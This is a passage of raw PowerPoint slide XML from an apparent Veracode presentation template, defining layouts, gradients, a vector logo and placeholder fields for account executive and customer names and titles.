          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[AE Name]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Account Executive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1332225668"/>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1" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="192">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_Section_Light_1">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82C6DD3E-4300-B9A1-E9B5-A2D1AED88C65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6860356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="2000">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="16000">
                <a:srgbClr val="172D34"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="55000">
                <a:schemeClr val="tx2"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="2700000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0148FA7A-945E-C916-B1B4-720F1A313770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-1578934" y="1575160"/>
            <a:ext cx="5340838" cy="2185806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent4">
                  <a:alpha val="13628"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="51000">
                <a:schemeClr val="tx2">
                  <a:alpha val="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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69475B6-0C4B-6081-1929-C135318E2266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3831176"/>
            <a:ext cx="4168588" cy="3026825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="98000">
                <a:schemeClr val="accent2">
                  <a:alpha val="52075"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="51000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79F9FFF-D391-9181-1E57-B793AEE6B1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="14080" r="25404" b="19511"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955371" y="-2356"/>
            <a:ext cx="7236629" cy="6860356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84587DF-5FFD-028C-B731-1FAC947E84E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411734" y="5031895"/>
            <a:ext cx="5336993" cy="1022350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Veracode Name &amp; Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Veracode Name &amp; Title </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF76F4-6ADC-EC4A-9B4B-1F0E5D223F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436975" y="3206205"/>
            <a:ext cx="7157626" cy="1459833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Customer Name &amp; Title</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Customer Name &amp; Title </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{859732BF-251D-544B-B551-E3DA0279EA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89FC5416-733F-3547-84EC-CAF4AFC3F4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FA68A0B-E24D-D285-DB54-32B95E623C6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9773864" y="5026636"/>
            <a:ext cx="2418136" cy="1831364"/>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solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08660328-1BC6-7021-EE8F-BF098919EE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="537333" y="675233"/>
            <a:ext cx="2699420" cy="400385"/>
            <a:chOff x="4488107" y="1762031"/>
            <a:chExt cx="1820226" cy="272415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="181" name="Freeform: Shape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD6C27-9E43-8846-B7C0-D9BEFE7B8149}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5603484" y="1762031"/>
              <a:ext cx="360997" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 360997"/>
                <a:gd name="connsiteY1" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY2" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 274320 w 360997"/>
                <a:gd name="connsiteY3" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY5" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 56198 w 360997"/>
                <a:gd name="connsiteY6" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY7" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 218123 w 360997"/>
                <a:gd name="connsiteY8" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY9" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY10" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY12" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY13" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY14" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 320040 w 360997"/>
                <a:gd name="connsiteY15" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY16" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX17" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY17" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX18" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY18" fmla="*/ 215265 h 272415"/>
                <a:gd name="connsiteX19" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY19" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX20" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY20" fmla="*/ 267653 h 272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0997" h="272415">
                  <a:moveTo>
                    <a:pt x="137160" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="211455"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="137160" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212407" y="272415"/>
                    <a:pt x="274320" y="211455"/>
                    <a:pt x="274320" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273368" y="60008"/>
                    <a:pt x="213360" y="0"/>
                    <a:pt x="137160" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="137160" y="220028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80963" y="220028"/>
                    <a:pt x="56198" y="171450"/>
                    <a:pt x="56198" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56198" y="100965"/>
                    <a:pt x="80963" y="52388"/>
                    <a:pt x="137160" y="52388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196215" y="52388"/>
                    <a:pt x="218123" y="104775"/>
                    <a:pt x="218123" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218123" y="171450"/>
                    <a:pt x="192405" y="220028"/>
                    <a:pt x="137160" y="220028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="304800" y="267653"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304800" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320040" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="215265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="267653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="267653"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00B3E7"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="Freeform: Shape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB07DB5C-3151-9542-2606-47D4741DE009}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4488107" y="1766793"/>
              <a:ext cx="865822" cy="263842"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY0" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX1" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY1" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX2" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY2" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX3" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY3" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX4" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY4" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX5" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY5" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX6" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY6" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX7" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY7" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX8" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY8" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX9" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY9" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX10" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX11" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX12" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY12" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX13" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY13" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX14" fmla="*/ 60008 w 865822"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 865822"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX16" fmla="*/ 105728 w 865822"/>
                <a:gd name="connsiteY16" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX17" fmla="*/ 140970 w 865822"/>
                <a:gd name="connsiteY17" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX18" fmla="*/ 246698 w 865822"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX19" fmla="*/ 187643 w 865822"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX20" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY20" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX21" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY21" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX22" fmla="*/ 624840 w 865822"/>
                <a:gd name="connsiteY22" fmla="*/ 252413 h 263842"/>
                <a:gd name="connsiteX23" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY23" fmla="*/ 169545 h 263842"/>
                <a:gd name="connsiteX24" fmla="*/ 627698 w 865822"/>
                <a:gd name="connsiteY24" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX25" fmla="*/ 601980 w 865822"/>
                <a:gd name="connsiteY25" fmla="*/ 22860 h 263842"/>
                <a:gd name="connsiteX26" fmla="*/ 530543 w 865822"/>
                <a:gd name="connsiteY26" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX27" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY27" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX28" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY28" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX29" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY29" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX30" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY30" fmla="*/ 171450 h 263842"/>
                <a:gd name="connsiteX31" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY31" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX32" fmla="*/ 678180 w 865822"/>
                <a:gd name="connsiteY32" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX33" fmla="*/ 699135 w 865822"/>
                <a:gd name="connsiteY33" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX34" fmla="*/ 785813 w 865822"/>
                <a:gd name="connsiteY34" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX35" fmla="*/ 806768 w 865822"/>
                <a:gd name="connsiteY35" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX36" fmla="*/ 865823 w 865822"/>
                <a:gd name="connsiteY36" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX37" fmla="*/ 765810 w 865822"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX38" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX39" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY39" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX40" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY40" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX41" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY41" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX42" fmla="*/ 528638 w 865822"/>
                <a:gd name="connsiteY42" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX43" fmla="*/ 572453 w 865822"/>
                <a:gd name="connsiteY43" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX44" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY44" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX45" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY45" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX46" fmla="*/ 741998 w 865822"/>
                <a:gd name="connsiteY46" fmla="*/ 86678 h 263842"/>
                <a:gd name="connsiteX47" fmla="*/ 766763 w 865822"/>
                <a:gd name="connsiteY47" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX48" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY48" fmla="*/ 158115 h 26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865822" h="263842">
                  <a:moveTo>
                    <a:pt x="260985" y="262890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412433" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="262890"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123825" y="164783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109538" y="128588"/>
                    <a:pt x="60008" y="0"/>
                    <a:pt x="60008" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
